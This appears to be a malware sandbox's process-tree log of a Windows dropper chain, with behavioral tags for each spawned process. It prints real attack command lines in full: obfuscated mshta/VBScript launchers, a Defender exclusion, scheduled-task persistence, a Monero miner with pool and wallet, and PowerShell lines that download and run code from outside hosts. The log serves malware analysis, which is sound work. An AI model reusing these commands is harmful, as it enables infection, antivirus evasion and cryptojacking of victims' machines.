C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8412 -s 8687⤵
- Program crash
-
C:\Users\Admin\Documents\NH3FkoeG7J4YlvgvJckCoEso.exe"C:\Users\Admin\Documents\NH3FkoeG7J4YlvgvJckCoEso.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\Installer.exe"C:\Program Files (x86)\Company\NewProduct\Installer.exe"7⤵
- Adds Run key to start application
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Users\Admin\Documents\PxbGelbvq_K5GKXwFDCfBMu1.exe"C:\Users\Admin\Documents\PxbGelbvq_K5GKXwFDCfBMu1.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8376 -s 7007⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8376 -s 6287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8376 -s 10687⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\G2eUctc5reN_m1RRWuUsiZZe.exe"C:\Users\Admin\Documents\G2eUctc5reN_m1RRWuUsiZZe.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15ac1df9305ded09.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15ac1df9305ded09.exeWed15ac1df9305ded09.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed150b6a68b74a9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed150b6a68b74a9.exeWed150b6a68b74a9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed154a69e494d5e99ca.exeWed154a69e494d5e99ca.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Firstoffer.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\inst3.exe"C:\Users\Admin\AppData\Local\Temp\inst3.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 3608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 4848⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 4968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 5008⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 4688⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"installer.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KTTRJ.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-KTTRJ.tmp\installer.tmp" /SL5="$4038E,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 7528⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 8368⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 8568⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 7888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 8448⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 8808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 8928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 9128⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 10928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 11128⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 11168⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 10408⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Install.EXE"C:\Users\Admin\AppData\Local\Temp\Install.EXE"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS9D2B.tmp\Install.cmd" "9⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8963394.scr"C:\Users\Admin\AppData\Roaming\8963394.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8352699.scr"C:\Users\Admin\AppData\Roaming\8352699.scr" /S8⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6599237.scr"C:\Users\Admin\AppData\Roaming\6599237.scr" /S8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5822975.scr"C:\Users\Admin\AppData\Roaming\5822975.scr" /S8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" == "" for %z iN ( "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run ("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0 , trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-II2IL.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-II2IL.tmp\setup_2.tmp" /SL5="$102FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QEBLM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-QEBLM.tmp\setup_2.tmp" /SL5="$20310,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F7EB4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-F7EB4.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.top/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\NZBsdlcTK.exe"C:\Users\Admin\AppData\Local\Temp\NZBsdlcTK.exe"13⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c "helimlim.bat"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA15⤵
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs16⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\pli-game.exe"C:\Users\Admin\AppData\Local\Temp\pli-game.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15cdfe4f1ee8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15cdfe4f1ee8.exeWed15cdfe4f1ee8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15cdfe4f1ee8.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15cdfe4f1ee8.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15cdfe4f1ee8.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15cdfe4f1ee8.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Wed15cdfe4f1ee8.exe"8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1556d5b7e9b2c8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed1556d5b7e9b2c8.exeWed1556d5b7e9b2c8.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15e2f113a40ce5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15e2f113a40ce5.exeWed15e2f113a40ce5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15e2f113a40ce5.exeC:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15e2f113a40ce5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15c2e7469a14dca.exeWed15c2e7469a14dca.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Wed15c2e7469a14dca.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15c2e7469a14dca.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Wed15c2e7469a14dca.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15fbd6ef41b4f.exeWed15fbd6ef41b4f.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15edb855a49.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15edb855a49.exeWed15edb855a49.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS099867B2\Wed15566afaea59e.exeWed15566afaea59e.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15bfd6504f7748c.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff95c044f50,0x7ff95c044f60,0x7ff95c044f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1700 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,6788188827361051022,7767864419025472567,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4016 /prefetch:82⤵
-
